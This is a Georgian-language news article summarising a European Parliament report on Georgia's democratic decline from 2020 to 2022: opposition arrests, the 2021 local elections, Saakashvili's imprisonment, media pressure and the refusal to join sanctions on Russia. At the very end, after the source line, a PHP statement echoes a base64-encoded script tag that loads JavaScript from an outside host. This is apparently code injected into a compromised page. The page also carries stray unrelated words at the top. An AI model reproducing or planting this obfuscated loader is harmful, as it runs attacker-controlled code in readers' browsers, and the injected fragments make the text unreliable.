celsiusi
ავერსი საქკაბელი
დოკუმენტში საუბარია 2020 წლის აპრილიდან 2022 წლის თებერვლამდე პერიოდზე და ის ევროპარლამენტისთვის საგარეო დოკუმენტის სახით, სორბონის უნივერსიტეტის ასოცირებული პროფესორისა და ევროპის კოლეჯის მოწვეული პროფესორის, ლორ დელკურის მიერ მომზადდა. 
 
დოკუმენტში ნათქვამია, რომ "საქართველომ, ბოლო 2 წლის განმავლობაში, დემოკრატიული პრინციპებისა და იმ მთავარი პოლიტიკური ვალდებულებების კუთხით, რომლებიც ასოცირების შეთანხმების ფარგლებში იკისრა, სერიოზულად დაიხია უკან".
 
მათივე თქმით, მკვეთრი პოლიტიკური პოლარიზაციიდან გამომდინარე, საქართველოს დემოკრატიული ინსტიტუტები "საკუთარ არსს თანდათან კარგავენ, მმართველი კოალიცია კი ძალაუფლებას ხელში სულ უფრო მეტად იგდებს და ზღუდავს სივრცეს განსხვავებული აზრისთვის". 
 
დოკუმენტში საუბარი ეხება ქვეყანაში "მნიშვნელოვნად გაუარესებულ კანონის უზენაესობას", რასაც, მათი ცნობით, "ადასტურებს ოპოზიციის ლიდერების დაკავება", ასევე "2019 წლის ივნისი/2021 წლის ივლისის ძალადობრივი ინციდენტების ეფექტური გამოძიების არარსებობა და სახელმწიფო ინსპექტორის სამსახურის გაუქმების გადაწყვეტილება". 
 
ანგარიშში საუბარი ეხება 2021 წლის ადგილობრივი თვითმმართველობის არჩევნებსაც - ნათქვამია, რომ ის მკვეთრად პოლარიზებულ გარემოში ჩატარდა.
 
"საარჩევნო კამპანია ასახავდა სულ უფრო აგრესიულ რიტორიკას და მედიაგარემოს მკვეთრ გაუარესებას. მიუხედავად იმისა, რომ არჩევნები განიხილებოდა, როგორც კონკურენტუნარიანი და კარგად ორგანიზებული, აღინიშნებოდა ბრალდებები დაშინების, ხმების მოსყიდვის, კანდიდატებსა და ამომრჩევლებზე ზეწოლის შესახებ" - აღნიშნულია დოკუმენტში.
 
აქვე, საუბარია საქართველოს მესამე პრეზიდენტის, მიხეილ სააკაშვილის საქართველოში ჩამოსვლასა და მის დაკავებაზე. დოკუმენტში ნათქვამია, რომ მისი ჯანმრთელობის მდგომარეობა ციხეში არასათანადო მოპყრობის შემდეგ გაუარესდა. აქვე, საერთაშორისო ორგანიზაციებზე დაყრდნობით, ანგარიშში ნათქვამია, რომ ეს [მიხეილ სააკაშვილის მიმართ მოპყრობა] "არამხოლოდ შერჩევითი სამართალი, არამედ აშკარა პოლიტიკური შურისძიება იყო. "ამას ადასტურებდა "ქართული ოცნების" ცნობილი ლიდერების, მათ შორის პრემიერ ღარიბაშვილის განცხადებები, რომლებიც სააკაშვილს "ბრალის დამძიმებით" დაემუქრნენ, რაც ადასტურებს პოლიტიკურ ჩარევას მართლმსაჯულების სისტემაში". 
 
ასევე, დოკუმენტში საუბარია ქართული მედიის გაუარესებულ მდგომარეობაზე და ჟურნალისტებზე თავდასხმებზე: "სამუშაო გარემო, რომელშიც ჟურნალისტები საქართველოში მუშაობენ, კიდევ უფრო რთული გახდა პოლიტიკური ჩარევის, ასევე ჟურნალისტების წინააღმდეგ სიტყვიერი და ფიზიკური თავდასხმების გამო". 
 
დოკუმენტში დადებითადაა შეფასებული საქართველოს თანაშრომლობა ევროკავშირის სტრუქტურებთან საგარეო და უსაფრთხოების პოლიტიკის კუთხით, თუმცა აქვე ხაზგასმულია, რომ "საქართველომ უარი თქვა 2022 წლის თებერვლის ბოლოს, უკრაინაში შეჭრის შემდეგ, რუსეთის წინააღმდეგ დაწესებულ სანქციებს შეერთებოდა".
 
წყარო: მთავარი არხი
979
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");